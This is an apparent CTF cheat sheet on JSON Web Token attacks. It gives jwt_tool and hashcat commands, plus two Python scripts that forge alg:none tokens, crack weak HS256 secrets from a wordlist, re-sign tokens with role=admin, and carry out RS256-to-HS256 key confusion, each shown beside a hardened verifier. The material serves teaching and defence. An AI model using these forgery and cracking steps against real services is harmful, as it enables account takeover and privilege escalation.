JSON Web Tokens (JWT)
JSON Web Tokens (JWT) are compact, self‑contained tokens that web applications use to carry authentication and authorization claims. A token is three Base64url‑encoded segments joined by dots:
header.payload.signature
In CTFs, JWTs turn up in authentication puzzles where a misconfiguration or a weak signing key lets you forge or modify claims and become another user, usually to escalate privileges or reveal a flag.
| Task | Command |
|---|---|
| Decode token manually | https://jwt.io (or Base64url‑decode the first two segments locally) |
| Analyze & exploit token | jwt_tool <token> |
| Test “none” algorithm | jwt_tool -X a <token> |
| Crack HMAC secret | jwt_tool --crack -d <wordlist> <token> |
| Re‑sign with a recovered secret | jwt_tool -I -pc role -pv admin -S hs256 -p <secret> <token> |
| Tool | Purpose |
|---|---|
| jwt_tool | Comprehensive JWT analysis/exploitation utility |
| jwt.io | Web interface for decoding & verifying tokens (avoid pasting real production tokens into third‑party sites) |
| Hashcat | Brute‑force weak HMAC secrets (mode 16500: JWT) |
| jwt‑cracker | Small standalone brute‑force cracker for HS256 tokens |
| CyberChef | Convenient for Base64 decoding + inspection |
| Part | Description |
|---|---|
| Header | Algorithm & token type (e.g. {"alg":"HS256","typ":"JWT"}) |
| Payload | User data & claims ({"user":"guest","role":"user"}) |
| Signature | Authenticates header.payload (HMAC with a shared secret, or RSA/ECDSA with the issuer’s private key) |
Example token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoic3R1ZGVudCIsInJvbGUiOiJ1c2VyIn0.gTZhw7xI25pUySAGfbt4h6blRC3UV1RS3u9bxTxg6z0
If the server accepts "alg":"none" and skips signature verification:
jwt_tool -X a <token>
This switches the header to alg none (jwt_tool also emits the None/NONE/nOnE spellings for verifiers that blocklist the exact string) and strips the signature, leaving the trailing dot in place. Try each candidate against the target.
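The forgery described above, written out so the accept/reject decision is visible. This is an added example, not jwt_tool’s code: it parses the page’s sample token, builds an alg:none variant with role=admin, and runs it through a verifier that trusts the header’s alg (vulnerable) and one that pins the algorithm (fixed). The verifier functions and the secret value are assumptions made for the demonstration.

```python
import base64
import hashlib
import hmac
import json

# Added example (not jwt_tool code): parse a JWT, forge an alg:none token, and show
# why a verifier that trusts the header's "alg" accepts it while a pinned one rejects it.

# Token from the page: {"alg":"HS256","typ":"JWT"} . {"user":"student","role":"user"}
SAMPLE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VyIjoic3R1ZGVudCIsInJvbGUiOiJ1c2VyIn0."
    "gTZhw7xI25pUySAGfbt4h6blRC3UV1RS3u9bxTxg6z0"
)


def b64url_decode(s: str) -> bytes:
    # JWT segments drop the '=' padding; restore it before decoding
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def compact_json(obj: dict) -> str:
    # Compact separators reproduce the encoding JWT libraries emit
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def decode_token(token: str):
    header_b64, payload_b64, sig_b64 = token.split(".")
    return (json.loads(b64url_decode(header_b64)),
            json.loads(b64url_decode(payload_b64)),
            b64url_decode(sig_b64))


def forge_none(token: str, alg_variant: str = "none", **new_claims) -> str:
    # Same idea as `jwt_tool -X a`: switch alg, edit claims, drop the signature
    header, payload, _ = decode_token(token)
    header["alg"] = alg_variant  # jwt_tool also tries None / NONE / nOnE
    payload.update(new_claims)
    return f"{compact_json(header)}.{compact_json(payload)}."  # empty third segment


def vulnerable_verify(token: str, secret: bytes) -> dict:
    # Bug under test: the algorithm is taken from the attacker-controlled header
    header, payload, sig = decode_token(token)
    signing_input = token.rsplit(".", 1)[0].encode()
    alg = header.get("alg", "")
    if alg.lower() == "none":  # sloppy match mirrors libraries that accepted the spelling variants
        return payload
    if alg == "HS256":
        expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(expected, sig):
            return payload
    raise ValueError("signature verification failed")


def hardened_verify(token: str, secret: bytes, expected_alg: str = "HS256") -> dict:
    # Fix: the server pins the algorithm it issued; "none" can never be selected by the token
    header, payload, sig = decode_token(token)
    if header.get("alg") != expected_alg:
        raise ValueError(f"algorithm {header.get('alg')!r} not allowed")
    signing_input = token.rsplit(".", 1)[0].encode()
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        raise ValueError("signature verification failed")
    return payload


if __name__ == "__main__":
    forged = forge_none(SAMPLE_TOKEN, role="admin")
    print(forged)
    print("vulnerable verifier returns:", vulnerable_verify(forged, b"assumed-secret"))
    try:
        hardened_verify(forged, b"assumed-secret")
    except ValueError as e:
        print("hardened verifier:", e)
```

The forged token carries no signature at all, so the vulnerable verifier never even needs to know the secret; the hardened verifier rejects on the header mismatch before touching any crypto, which is the check to look for when reading target source.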
If the algorithm is HS256 (shared secret) and the key is weak, try cracking:
jwt_tool --crack -d rockyou.txt <token>
Or use Hashcat (token.txt holds the full token, one per line; attack mode 0 is the default):
hashcat -m 16500 token.txt rockyou.txt
Once the key is recovered, tamper with the claims and sign a new token with it (jwt_tool needs the algorithm spelled out for -S):
jwt_tool -I -pc role -pv admin -S hs256 -p <secret> <token>
If the server signs with RSA (RS256) but its verification code takes the algorithm from the token header and hands the same key object to whichever branch runs, change alg to HS256 and use the server’s public key as the HMAC secret: the server then computes an HMAC over your token with the public key it already holds, and the forgery validates. The HMAC key must be the exact bytes the server loads (the PEM as served, including line wrapping and trailing newline), so use the key exactly as the target exposes it rather than re‑encoding it. jwt_tool automates this with jwt_tool -X k -pk public.pem <token>. Maintained libraries reject this by making the caller pin the expected algorithm, so it mostly appears in CTFs and hand‑rolled verifiers.
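The cracking and re‑signing steps above, plus the RS256‑to‑HS256 key confusion, as one added example that is not jwt_tool’s or Hashcat’s code. It builds a token signed with a weak secret, recovers the secret from a tiny constructed wordlist (a stand‑in for rockyou.txt), re‑signs with role=admin, and then forges an HS256 token keyed with a placeholder PEM against a verifier that dispatches on the header’s alg. The wordlist, the secret, the PEM bytes and both verifier functions are assumptions; the placeholder PEM only shows the mechanics, since the real attack needs the target’s genuine key bytes.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Added example, not jwt_tool code: crack a weak HS256 secret against a wordlist,
# re-sign the token with role=admin, then build an RS256 -> HS256 key-confusion token.


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def hs256(signing_input: bytes, key: bytes) -> bytes:
    return hmac.new(key, signing_input, hashlib.sha256).digest()


def encode_segments(header: dict, payload: dict) -> bytes:
    # Compact JSON matches what JWT libraries emit; this is the exact HMAC input
    return ".".join(b64url_encode(json.dumps(d, separators=(",", ":")).encode())
                    for d in (header, payload)).encode()


def build_hs256_token(header: dict, payload: dict, key: bytes) -> str:
    signing_input = encode_segments(header, payload)
    return signing_input.decode() + "." + b64url_encode(hs256(signing_input, key))


def split_token(token: str):
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    return header, payload, f"{header_b64}.{payload_b64}".encode(), b64url_decode(sig_b64)


# Constructed input: a token the target would issue, signed with a weak secret
WEAK_SECRET = b"secret123"
WORDLIST = ["123456", "password", "letmein", "secret123", "qwerty"]  # stand-in for rockyou.txt
ISSUED_TOKEN = build_hs256_token({"alg": "HS256", "typ": "JWT"},
                                 {"user": "student", "role": "user"}, WEAK_SECRET)


def crack_hs256(token: str, wordlist) -> Optional[bytes]:
    # What `jwt_tool --crack` and `hashcat -m 16500` do at scale: recompute the HMAC per guess
    _, _, signing_input, sig = split_token(token)
    for word in wordlist:
        guess = word.rstrip("\n").encode()
        if hmac.compare_digest(hs256(signing_input, guess), sig):
            return guess
    return None


def resign_with_claims(token: str, key: bytes, **claims) -> str:
    # Equivalent of `jwt_tool -I -pc role -pv admin -S hs256 -p <secret>`
    header, payload, _, _ = split_token(token)
    payload.update(claims)
    return build_hs256_token(header, payload, key)


# Constructed placeholder for the server's public key. The real attack needs the genuine
# PEM byte-for-byte (header lines, wrapping, trailing newline), because that is the HMAC key.
SERVER_PUBLIC_KEY_PEM = (b"-----BEGIN PUBLIC KEY-----\n"
                         b"CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-KEY\n"
                         b"-----END PUBLIC KEY-----\n")

# Constructed RS256 token from the same server; the signature bytes are fake because the
# attack never needs a valid RSA signature, only the header and claims.
RS256_TOKEN = (encode_segments({"alg": "RS256", "typ": "JWT"}, {"user": "student", "role": "user"}).decode()
               + "." + b64url_encode(b"not-a-real-rsa-signature"))


def key_confusion_token(token: str, public_key_pem: bytes, **claims) -> str:
    # Same idea as `jwt_tool -X k -pk public.pem`: flip alg to HS256, HMAC with the PEM bytes
    header, payload, _, _ = split_token(token)
    header["alg"] = "HS256"
    payload.update(claims)
    return build_hs256_token(header, payload, public_key_pem)


def confused_verify(token: str, key: bytes) -> bool:
    # Vulnerable pattern: dispatch on the header's alg and hand the same `key` to every branch
    header, _, signing_input, sig = split_token(token)
    if header.get("alg") == "HS256":
        return hmac.compare_digest(hs256(signing_input, key), sig)
    if header.get("alg") == "RS256":
        raise NotImplementedError("RSA check omitted: the forged token never reaches this branch")
    return False


def pinned_verify(token: str, key: bytes, expected_alg: str) -> bool:
    # Fix: the server decides the algorithm; a header that disagrees fails before any crypto runs
    header, _, signing_input, sig = split_token(token)
    if header.get("alg") != expected_alg:
        return False
    if expected_alg == "HS256":
        return hmac.compare_digest(hs256(signing_input, key), sig)
    raise NotImplementedError("RSA check omitted for brevity")


if __name__ == "__main__":
    secret = crack_hs256(ISSUED_TOKEN, WORDLIST)
    print("cracked secret:", secret)
    print("admin token:", resign_with_claims(ISSUED_TOKEN, secret, role="admin"))
    forged = key_confusion_token(RS256_TOKEN, SERVER_PUBLIC_KEY_PEM, role="admin")
    print("confused verifier accepts forgery:", confused_verify(forged, SERVER_PUBLIC_KEY_PEM))
    print("pinned RS256 verifier accepts forgery:", pinned_verify(forged, SERVER_PUBLIC_KEY_PEM, "RS256"))
```

Cracking cost is one HMAC‑SHA256 per guess, which is why Hashcat mode 16500 chews through rockyou.txt in seconds on a GPU; a secret that is long and random is out of reach, so the crack only pays off when the operator chose a dictionary word. For the confusion case, note that confused_verify never looks at what kind of key it was given, which is the entire bug.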